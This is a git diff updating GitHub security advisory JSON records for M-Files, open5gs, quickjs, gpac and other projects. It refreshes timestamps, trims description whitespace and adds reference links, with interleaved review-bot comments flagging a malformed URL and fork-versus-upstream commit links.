b/advisories/unreviewed/2023/08/GHSA-fx24-f32v-56xf/GHSA-fx24-f32v-56xf.json index 0858fa157f1c4..cc2fc63879938 100644 --- a/advisories/unreviewed/2023/08/GHSA-fx24-f32v-56xf/GHSA-fx24-f32v-56xf.json +++ b/advisories/unreviewed/2023/08/GHSA-fx24-f32v-56xf/GHSA-fx24-f32v-56xf.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fx24-f32v-56xf", - "modified": "2024-08-28T09:30:32Z", + "modified": "2026-02-23T09:31:18Z", "published": "2023-08-25T09:30:21Z", "aliases": [ "CVE-2023-3425" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3425" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-3425" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-3425" diff --git a/advisories/unreviewed/2023/08/GHSA-g25q-jw4h-pppq/GHSA-g25q-jw4h-pppq.json b/advisories/unreviewed/2023/08/GHSA-g25q-jw4h-pppq/GHSA-g25q-jw4h-pppq.json index 41b762f72236a..7a3d75882a363 100644 --- a/advisories/unreviewed/2023/08/GHSA-g25q-jw4h-pppq/GHSA-g25q-jw4h-pppq.json +++ b/advisories/unreviewed/2023/08/GHSA-g25q-jw4h-pppq/GHSA-g25q-jw4h-pppq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g25q-jw4h-pppq", - "modified": "2024-08-28T09:30:32Z", + "modified": "2026-02-23T09:31:17Z", "published": "2023-08-25T09:30:21Z", "aliases": [ "CVE-2023-3406" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3406" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-3406" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-3406" diff --git a/advisories/unreviewed/2023/10/GHSA-566r-vx98-9rr7/GHSA-566r-vx98-9rr7.json b/advisories/unreviewed/2023/10/GHSA-566r-vx98-9rr7/GHSA-566r-vx98-9rr7.json index 4a664e7b13098..efe2daf016191 100644 --- a/advisories/unreviewed/2023/10/GHSA-566r-vx98-9rr7/GHSA-566r-vx98-9rr7.json +++ b/advisories/unreviewed/2023/10/GHSA-566r-vx98-9rr7/GHSA-566r-vx98-9rr7.json 
@@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-566r-vx98-9rr7", - "modified": "2024-08-28T09:30:33Z", + "modified": "2026-02-23T09:31:18Z", "published": "2023-10-20T09:30:27Z", "aliases": [ "CVE-2023-2325" ], - "details": "Stored XSS Vulnerability in M-Files Classic Web versions before 23.10 and LTS Service Release Versions before 23.2 LTS SR4 and 23.8 LTS SR1allows attacker to execute script on users browser via stored HTML document.\n\n", + "details": "Stored XSS Vulnerability in M-Files Classic Web versions before 23.10 and LTS Service Release Versions before 23.2 LTS SR4 and 23.8 LTS SR1allows attacker to execute script on users browser via stored HTML document.", "severity": [ { "type": "CVSS_V3", @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2325" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-2325" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-2325" diff --git a/advisories/unreviewed/2023/10/GHSA-94xm-wg2w-cvfq/GHSA-94xm-wg2w-cvfq.json b/advisories/unreviewed/2023/10/GHSA-94xm-wg2w-cvfq/GHSA-94xm-wg2w-cvfq.json index 7565cbb05a1e5..1a9a0f285ae11 100644 --- a/advisories/unreviewed/2023/10/GHSA-94xm-wg2w-cvfq/GHSA-94xm-wg2w-cvfq.json +++ b/advisories/unreviewed/2023/10/GHSA-94xm-wg2w-cvfq/GHSA-94xm-wg2w-cvfq.json 
@@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-94xm-wg2w-cvfq", - "modified": "2024-08-28T09:30:33Z", + "modified": "2026-02-23T09:31:18Z", "published": "2023-10-20T09:30:28Z", "aliases": [ "CVE-2023-5523" ], - "details": "Execution of downloaded content flaw in M-Files Web Companion before release version 23.10 and LTS Service Release Versions before 23.8 LTS SR1 allows \n\nRemote Code Execution \n\n", + "details": "Execution of downloaded content flaw in M-Files Web Companion before release version 23.10 and LTS Service Release Versions before 23.8 LTS SR1 allows \n\nRemote Code Execution ", "severity": [ { "type": "CVSS_V3", @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5523" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-5523" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-5523" diff --git a/advisories/unreviewed/2023/10/GHSA-r2vj-428g-v68v/GHSA-r2vj-428g-v68v.json b/advisories/unreviewed/2023/10/GHSA-r2vj-428g-v68v/GHSA-r2vj-428g-v68v.json index 423974c2745dc..de3603ebcc973 100644 --- a/advisories/unreviewed/2023/10/GHSA-r2vj-428g-v68v/GHSA-r2vj-428g-v68v.json +++ b/advisories/unreviewed/2023/10/GHSA-r2vj-428g-v68v/GHSA-r2vj-428g-v68v.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-r2vj-428g-v68v", - "modified": "2024-08-28T09:30:33Z", + "modified": "2026-02-23T09:31:18Z", "published": "2023-10-20T09:30:28Z", "aliases": [ "CVE-2023-5524" ], - "details": "Insufficient blacklisting in M-Files Web Companion before release version 23.10 and LTS Service Release Versions before 23.8 LTS SR1 allows \n\nRemote Code Execution\n\n via specific file types\n\n", + "details": "Insufficient blacklisting in M-Files Web Companion before release version 23.10 and LTS Service Release Versions before 23.8 LTS SR1 allows \n\nRemote Code Execution\n\n via specific file types", "severity": [ { "type": "CVSS_V3", 
@@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5524" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-5524" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-5524" diff --git a/advisories/unreviewed/2023/11/GHSA-cccf-mjv6-phwq/GHSA-cccf-mjv6-phwq.json b/advisories/unreviewed/2023/11/GHSA-cccf-mjv6-phwq/GHSA-cccf-mjv6-phwq.json index 98d1d53622cfa..9fc5c62753d7a 100644 --- a/advisories/unreviewed/2023/11/GHSA-cccf-mjv6-phwq/GHSA-cccf-mjv6-phwq.json +++ b/advisories/unreviewed/2023/11/GHSA-cccf-mjv6-phwq/GHSA-cccf-mjv6-phwq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cccf-mjv6-phwq", - "modified": "2024-08-28T09:30:33Z", + "modified": "2026-02-23T09:31:18Z", "published": "2023-11-22T12:30:26Z", "aliases": [ "CVE-2023-6117" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6117" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-6117" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-6117" diff --git a/advisories/unreviewed/2023/11/GHSA-v3xm-8fcm-8j8q/GHSA-v3xm-8fcm-8j8q.json b/advisories/unreviewed/2023/11/GHSA-v3xm-8fcm-8j8q/GHSA-v3xm-8fcm-8j8q.json index 016fab859039b..ccbc89da141ff 100644 --- a/advisories/unreviewed/2023/11/GHSA-v3xm-8fcm-8j8q/GHSA-v3xm-8fcm-8j8q.json +++ b/advisories/unreviewed/2023/11/GHSA-v3xm-8fcm-8j8q/GHSA-v3xm-8fcm-8j8q.json 
@@ -1,12 +1,12 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-v3xm-8fcm-8j8q",
- "modified": "2024-08-28T09:30:33Z",
+ "modified": "2026-02-23T09:31:18Z",
 "published": "2023-11-22T12:30:26Z",
 "aliases": [
 "CVE-2023-6189"
 ],
- "details": "\nMissing access permissions checks\n\n in the M-Files server before 23.11.13156.0 allow attackers to perform data write and export\n\njobs using the M-Files API methods.",
+ "details": "Missing access permissions checks\n\n in the M-Files server before 23.11.13156.0 allow attackers to perform data write and export\n\njobs using the M-Files API methods.",
 "severity": [
 {
 "type": "CVSS_V3",
@@ -19,6 +19,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6189"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2023-6189"
+ },
 {
 "type": "WEB",
 "url": "https://https://www.m-files.com/about/trust-center/security-advisories/cve-2023-6189"
diff --git a/advisories/unreviewed/2023/11/GHSA-xjc5-m98p-6f2c/GHSA-xjc5-m98p-6f2c.json b/advisories/unreviewed/2023/11/GHSA-xjc5-m98p-6f2c/GHSA-xjc5-m98p-6f2c.json
index e408b0b01e999..aea4e76bccfed 100644
--- a/advisories/unreviewed/2023/11/GHSA-xjc5-m98p-6f2c/GHSA-xjc5-m98p-6f2c.json
+++ b/advisories/unreviewed/2023/11/GHSA-xjc5-m98p-6f2c/GHSA-xjc5-m98p-6f2c.json
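Review bot: In the GHSA-v3xm-8fcm-8j8q.json hunk at `@@ -19,6 +19,10 @@`, the context entry directly after the new empower.m-files.com reference still carries a doubled scheme, `"url": "https://https://www.m-files.com/about/trust-center/security-advisories/cve-2023-6189"`. A strict URL parser will either reject it or treat `https` as the host name, so the vendor reference is unusable for anyone following it or link-checking the record. Since this sync already edits the references array, the entry should be reduced to a single `https://` prefix, or dropped if the page no longer exists (not verifiable from the diff). A scheme/host validation step at import time would catch values like this before they land.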
@@ -1,12 +1,12 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-xjc5-m98p-6f2c",
- "modified": "2024-08-28T09:30:33Z",
+ "modified": "2026-02-23T09:31:18Z",
 "published": "2023-11-28T15:30:22Z",
 "aliases": [
 "CVE-2023-6239"
 ],
- "details": "Improperly calculated effective permissions in M-Files Server versions 23.9 and 23.10 and 23.11 before 23.11.13168.7 could produce a faulty result if an object used a specific configuration of metadata-driven permissions.\n",
+ "details": "Improperly calculated effective permissions in M-Files Server versions 23.9 and 23.10 and 23.11 before 23.11.13168.7 could produce a faulty result if an object used a specific configuration of metadata-driven permissions.",
 "severity": [
 {
 "type": "CVSS_V3",
@@ -19,6 +19,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6239"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2023-6239"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2023-6239"
diff --git a/advisories/unreviewed/2023/12/GHSA-4mcp-5qpc-wgf8/GHSA-4mcp-5qpc-wgf8.json b/advisories/unreviewed/2023/12/GHSA-4mcp-5qpc-wgf8/GHSA-4mcp-5qpc-wgf8.json
index d75a5de668800..f9721f7271c64 100644
--- a/advisories/unreviewed/2023/12/GHSA-4mcp-5qpc-wgf8/GHSA-4mcp-5qpc-wgf8.json
+++ b/advisories/unreviewed/2023/12/GHSA-4mcp-5qpc-wgf8/GHSA-4mcp-5qpc-wgf8.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-4mcp-5qpc-wgf8",
- "modified": "2024-08-28T09:30:33Z",
+ "modified": "2026-02-23T09:31:18Z",
 "published": "2023-12-20T12:30:26Z",
 "aliases": [
 "CVE-2023-6910"
@@ -19,6 +19,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6910"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2023-6910"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2023-6910"
diff --git a/advisories/unreviewed/2024/03/GHSA-r32c-fmcr-34r3/GHSA-r32c-fmcr-34r3.json b/advisories/unreviewed/2024/03/GHSA-r32c-fmcr-34r3/GHSA-r32c-fmcr-34r3.json
index 8c6b85614ce17..51b63bedf2f40 100644
--- a/advisories/unreviewed/2024/03/GHSA-r32c-fmcr-34r3/GHSA-r32c-fmcr-34r3.json
+++ b/advisories/unreviewed/2024/03/GHSA-r32c-fmcr-34r3/GHSA-r32c-fmcr-34r3.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-r32c-fmcr-34r3",
- "modified": "2024-08-28T09:30:33Z",
+ "modified": "2026-02-23T09:31:18Z",
 "published": "2024-03-04T09:30:29Z",
 "aliases": [
 "CVE-2023-4479"
@@ -19,6 +19,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4479"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2023-4479"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2023-4479"
diff --git a/advisories/unreviewed/2026/01/GHSA-25w3-vxr6-gm5r/GHSA-25w3-vxr6-gm5r.json b/advisories/unreviewed/2026/01/GHSA-25w3-vxr6-gm5r/GHSA-25w3-vxr6-gm5r.json
index 71f1353325dc0..1ee415154ade0 100644
--- a/advisories/unreviewed/2026/01/GHSA-25w3-vxr6-gm5r/GHSA-25w3-vxr6-gm5r.json
+++ b/advisories/unreviewed/2026/01/GHSA-25w3-vxr6-gm5r/GHSA-25w3-vxr6-gm5r.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-25w3-vxr6-gm5r",
- "modified": "2026-01-19T18:30:28Z",
+ "modified": "2026-02-23T09:31:21Z",
 "published": "2026-01-19T18:30:28Z",
 "aliases": [
 "CVE-2026-1169"
@@ -27,6 +27,10 @@
 "type": "WEB",
 "url": "https://github.com/birkir/prime/issues/547"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/birkir/prime"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.341763"
diff --git a/advisories/unreviewed/2026/01/GHSA-27fq-8xxm-gqgw/GHSA-27fq-8xxm-gqgw.json b/advisories/unreviewed/2026/01/GHSA-27fq-8xxm-gqgw/GHSA-27fq-8xxm-gqgw.json
index 9d3e16f92cf3b..410c8bf7179db 100644
--- a/advisories/unreviewed/2026/01/GHSA-27fq-8xxm-gqgw/GHSA-27fq-8xxm-gqgw.json
+++ b/advisories/unreviewed/2026/01/GHSA-27fq-8xxm-gqgw/GHSA-27fq-8xxm-gqgw.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-27fq-8xxm-gqgw",
- "modified": "2026-01-17T18:30:19Z",
+ "modified": "2026-02-23T09:31:20Z",
 "published": "2026-01-17T18:30:19Z",
 "aliases": [
 "CVE-2025-15532"
@@ -39,6 +39,10 @@
 "type": "WEB",
 "url": "https://github.com/open5gs/open5gs/commit/c7c131f8d2cb1195ada5e0e691b6868ebcd8a845"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/open5gs/open5gs"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.341599"
@@ -54,6 +58,18 @@
 {
 "type": "WEB",
 "url": "https://vuldb.com/?submit.729357"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.735340"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.735341"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.735342"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2026/01/GHSA-29jx-3q54-p8gq/GHSA-29jx-3q54-p8gq.json b/advisories/unreviewed/2026/01/GHSA-29jx-3q54-p8gq/GHSA-29jx-3q54-p8gq.json
index fd9c6eca6019d..299e8ffdf1838 100644
--- a/advisories/unreviewed/2026/01/GHSA-29jx-3q54-p8gq/GHSA-29jx-3q54-p8gq.json
+++ b/advisories/unreviewed/2026/01/GHSA-29jx-3q54-p8gq/GHSA-29jx-3q54-p8gq.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-29jx-3q54-p8gq",
- "modified": "2026-01-17T00:30:24Z",
+ "modified": "2026-02-23T09:31:20Z",
 "published": "2026-01-17T00:30:24Z",
 "aliases": [
 "CVE-2025-15528"
@@ -35,6 +35,10 @@
 "type": "WEB",
 "url": "https://github.com/open5gs/open5gs/commit/98f76e98df35cd6a35e868aa62715db7f8141ac1"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/open5gs/open5gs"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.341595"
@@ -46,6 +50,18 @@
 {
 "type": "WEB",
 "url": "https://vuldb.com/?submit.728128"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.729359"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.729360"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.738373"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2026/01/GHSA-2gmr-vqp5-r9qg/GHSA-2gmr-vqp5-r9qg.json b/advisories/unreviewed/2026/01/GHSA-2gmr-vqp5-r9qg/GHSA-2gmr-vqp5-r9qg.json
index 2596de30d57dd..d1766ade7b25f 100644
--- a/advisories/unreviewed/2026/01/GHSA-2gmr-vqp5-r9qg/GHSA-2gmr-vqp5-r9qg.json
+++ b/advisories/unreviewed/2026/01/GHSA-2gmr-vqp5-r9qg/GHSA-2gmr-vqp5-r9qg.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-2gmr-vqp5-r9qg",
- "modified": "2026-01-19T09:30:27Z",
+ "modified": "2026-02-23T09:31:21Z",
 "published": "2026-01-19T09:30:27Z",
 "aliases": [
 "CVE-2026-1144"
@@ -39,6 +39,10 @@
 "type": "WEB",
 "url": "https://github.com/quickjs-ng/quickjs/commit/ea3e9d77454e8fc9cb3ef3c504e9c16af5a80141"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/quickjs-ng/quickjs"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.341737"
diff --git a/advisories/unreviewed/2026/01/GHSA-2m9v-rwcf-g57m/GHSA-2m9v-rwcf-g57m.json b/advisories/unreviewed/2026/01/GHSA-2m9v-rwcf-g57m/GHSA-2m9v-rwcf-g57m.json
index 2bdc679869d05..687a9b6511226 100644
--- a/advisories/unreviewed/2026/01/GHSA-2m9v-rwcf-g57m/GHSA-2m9v-rwcf-g57m.json
+++ b/advisories/unreviewed/2026/01/GHSA-2m9v-rwcf-g57m/GHSA-2m9v-rwcf-g57m.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-2m9v-rwcf-g57m",
- "modified": "2026-01-17T18:30:20Z",
+ "modified": "2026-02-23T09:31:20Z",
 "published": "2026-01-17T18:30:20Z",
 "aliases": [
 "CVE-2026-1049"
@@ -31,6 +31,10 @@
 "type": "WEB",
 "url": "https://github.com/LigeroSmart/ligerosmart/issues/280#issue-3776580352"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/LigeroSmart/ligerosmart"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.341601"
@@ -42,6 +46,10 @@
 {
 "type": "WEB",
 "url": "https://vuldb.com/?submit.729402"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.746919"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2026/01/GHSA-2qfg-m3c3-m867/GHSA-2qfg-m3c3-m867.json b/advisories/unreviewed/2026/01/GHSA-2qfg-m3c3-m867/GHSA-2qfg-m3c3-m867.json
index e3ba5eb0f16a7..a85616cd1c4e9 100644
--- a/advisories/unreviewed/2026/01/GHSA-2qfg-m3c3-m867/GHSA-2qfg-m3c3-m867.json
+++ b/advisories/unreviewed/2026/01/GHSA-2qfg-m3c3-m867/GHSA-2qfg-m3c3-m867.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-2qfg-m3c3-m867",
- "modified": "2026-01-07T12:31:25Z",
+ "modified": "2026-02-23T09:31:19Z",
 "published": "2026-01-07T12:31:25Z",
 "aliases": [
 "CVE-2026-0642"
@@ -38,6 +38,10 @@
 {
 "type": "WEB",
 "url": "https://vuldb.com/?submit.732369"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.736161"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2026/01/GHSA-359g-wg43-pfv8/GHSA-359g-wg43-pfv8.json b/advisories/unreviewed/2026/01/GHSA-359g-wg43-pfv8/GHSA-359g-wg43-pfv8.json
index b6f3dadf88902..d81b5d7ba13d8 100644
--- a/advisories/unreviewed/2026/01/GHSA-359g-wg43-pfv8/GHSA-359g-wg43-pfv8.json
+++ b/advisories/unreviewed/2026/01/GHSA-359g-wg43-pfv8/GHSA-359g-wg43-pfv8.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-359g-wg43-pfv8",
- "modified": "2026-01-17T18:30:19Z",
+ "modified": "2026-02-23T09:31:20Z",
 "published": "2026-01-17T18:30:19Z",
 "aliases": [
 "CVE-2025-15531"
@@ -31,6 +31,10 @@
 "type": "WEB",
 "url": "https://github.com/open5gs/open5gs/issues/4233#issue-3776216182"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/open5gs/open5gs"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.341598"
diff --git a/advisories/unreviewed/2026/01/GHSA-3vj5-3fjj-88m8/GHSA-3vj5-3fjj-88m8.json b/advisories/unreviewed/2026/01/GHSA-3vj5-3fjj-88m8/GHSA-3vj5-3fjj-88m8.json
index be0e567b971d2..9b576af8404ba 100644
--- a/advisories/unreviewed/2026/01/GHSA-3vj5-3fjj-88m8/GHSA-3vj5-3fjj-88m8.json
+++ b/advisories/unreviewed/2026/01/GHSA-3vj5-3fjj-88m8/GHSA-3vj5-3fjj-88m8.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3vj5-3fjj-88m8",
- "modified": "2026-01-17T12:31:25Z",
+ "modified": "2026-02-23T09:31:20Z",
 "published": "2026-01-17T12:31:25Z",
 "aliases": [
 "CVE-2025-15530"
@@ -31,6 +31,10 @@
 "type": "WEB",
 "url": "https://github.com/open5gs/open5gs/issues/4231#issue-3774187007"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/open5gs/open5gs"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.341597"
diff --git a/advisories/unreviewed/2026/01/GHSA-4696-58w6-rqw4/GHSA-4696-58w6-rqw4.json b/advisories/unreviewed/2026/01/GHSA-4696-58w6-rqw4/GHSA-4696-58w6-rqw4.json
index 35cec6fb92bf9..63a6df2e31afe 100644
--- a/advisories/unreviewed/2026/01/GHSA-4696-58w6-rqw4/GHSA-4696-58w6-rqw4.json
+++ b/advisories/unreviewed/2026/01/GHSA-4696-58w6-rqw4/GHSA-4696-58w6-rqw4.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-4696-58w6-rqw4",
- "modified": "2026-01-18T09:30:27Z",
+ "modified": "2026-02-23T09:31:21Z",
 "published": "2026-01-18T09:30:27Z",
 "aliases": [
 "CVE-2025-15534"
@@ -39,6 +39,10 @@
 "type": "WEB",
 "url": "https://github.com/oneafter/1224/blob/main/segv1"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/raysan5/raylib"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.341706"
diff --git a/advisories/unreviewed/2026/01/GHSA-4mf2-6634-xrph/GHSA-4mf2-6634-xrph.json b/advisories/unreviewed/2026/01/GHSA-4mf2-6634-xrph/GHSA-4mf2-6634-xrph.json
index b330a038420b9..b2401ba6b6798 100644
--- a/advisories/unreviewed/2026/01/GHSA-4mf2-6634-xrph/GHSA-4mf2-6634-xrph.json
+++ b/advisories/unreviewed/2026/01/GHSA-4mf2-6634-xrph/GHSA-4mf2-6634-xrph.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-4mf2-6634-xrph",
- "modified": "2026-01-17T00:30:24Z",
+ "modified": "2026-02-23T09:31:20Z",
 "published": "2026-01-17T00:30:24Z",
 "aliases": [
 "CVE-2025-15529"
@@ -35,6 +35,10 @@
 "type": "WEB",
 "url": "https://github.com/open5gs/open5gs/commit/b19cf6a2dbf5d30811be4488bf059c865bd7d1d2"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/open5gs/open5gs"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.341596"
@@ -46,6 +50,10 @@
 {
 "type": "WEB",
 "url": "https://vuldb.com/?submit.728130"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.738372"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2026/01/GHSA-4p7v-9jxw-m3mp/GHSA-4p7v-9jxw-m3mp.json b/advisories/unreviewed/2026/01/GHSA-4p7v-9jxw-m3mp/GHSA-4p7v-9jxw-m3mp.json
index cbea30bc55efb..0947787c65125 100644
--- a/advisories/unreviewed/2026/01/GHSA-4p7v-9jxw-m3mp/GHSA-4p7v-9jxw-m3mp.json
+++ b/advisories/unreviewed/2026/01/GHSA-4p7v-9jxw-m3mp/GHSA-4p7v-9jxw-m3mp.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-4p7v-9jxw-m3mp",
- "modified": "2026-01-28T18:30:48Z",
+ "modified": "2026-02-23T09:31:22Z",
 "published": "2026-01-28T18:30:48Z",
 "aliases": [
 "CVE-2026-1522"
@@ -39,6 +39,10 @@
 "type": "WEB",
 "url": "https://github.com/open5gs/open5gs/commit/b19cf6a"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/open5gs/open5gs"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.343193"
diff --git a/advisories/unreviewed/2026/01/GHSA-5j8r-5f3r-4w9p/GHSA-5j8r-5f3r-4w9p.json b/advisories/unreviewed/2026/01/GHSA-5j8r-5f3r-4w9p/GHSA-5j8r-5f3r-4w9p.json
index f6dc0f1611847..856e715a3d6b4 100644
--- a/advisories/unreviewed/2026/01/GHSA-5j8r-5f3r-4w9p/GHSA-5j8r-5f3r-4w9p.json
+++ b/advisories/unreviewed/2026/01/GHSA-5j8r-5f3r-4w9p/GHSA-5j8r-5f3r-4w9p.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-5j8r-5f3r-4w9p",
- "modified": "2026-01-26T06:30:28Z",
+ "modified": "2026-02-23T09:31:22Z",
 "published": "2026-01-26T06:30:28Z",
 "aliases": [
 "CVE-2026-1418"
@@ -35,6 +35,10 @@
 "type": "WEB",
 "url": "https://github.com/enocknt/gpac/commit/10c73b82cf0e367383d091db38566a0e4fe71772"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/gpac/gpac"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.342807"
diff --git a/advisories/unreviewed/2026/01/GHSA-67vh-536w-6pc4/GHSA-67vh-536w-6pc4.json b/advisories/unreviewed/2026/01/GHSA-67vh-536w-6pc4/GHSA-67vh-536w-6pc4.json
index e847853348742..c80591ab94fd1 100644
--- a/advisories/unreviewed/2026/01/GHSA-67vh-536w-6pc4/GHSA-67vh-536w-6pc4.json
+++ b/advisories/unreviewed/2026/01/GHSA-67vh-536w-6pc4/GHSA-67vh-536w-6pc4.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-67vh-536w-6pc4",
- "modified": "2026-01-10T15:31:22Z",
+ "modified": "2026-02-23T09:31:19Z",
 "published": "2026-01-10T15:31:22Z",
 "aliases": [
 "CVE-2026-0822"
@@ -39,6 +39,10 @@
 "type": "WEB",
 "url": "https://github.com/quickjs-ng/quickjs/commit/53eefbcd695165a3bd8c584813b472cb4a69fbf5"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/quickjs-ng/quickjs"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.340356"
diff --git a/advisories/unreviewed/2026/01/GHSA-6cvf-4x5f-rv59/GHSA-6cvf-4x5f-rv59.json b/advisories/unreviewed/2026/01/GHSA-6cvf-4x5f-rv59/GHSA-6cvf-4x5f-rv59.json
index e7dd76696742e..a83a2e7658386 100644
--- a/advisories/unreviewed/2026/01/GHSA-6cvf-4x5f-rv59/GHSA-6cvf-4x5f-rv59.json
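Review bot: In GHSA-5j8r-5f3r-4w9p.json (`@@ -35,6 +35,10 @@`) the added repository reference `https://github.com/gpac/gpac` names a different owner than the fix-commit reference beside it, `https://github.com/enocknt/gpac/commit/10c73b82cf0e367383d091db38566a0e4fe71772`. The same mismatch shows up later in GHSA-9438-qf7w-49rg.json (commit under `enocknt/gpac`, repository `gpac/gpac`) and GHSA-jqv9-g2ph-pfw9.json (commit under `paralin/quickjs`, repository `quickjs-ng/quickjs`). Anyone deriving the patched revision from these references is sent to a fork rather than the project named as the package source. It would be worth confirming that each commit is present in the upstream repository and, if so, pointing the commit reference there; whether that holds cannot be determined from the diff.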
+++ b/advisories/unreviewed/2026/01/GHSA-6cvf-4x5f-rv59/GHSA-6cvf-4x5f-rv59.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-6cvf-4x5f-rv59",
- "modified": "2026-01-29T15:30:27Z",
+ "modified": "2026-02-23T09:31:23Z",
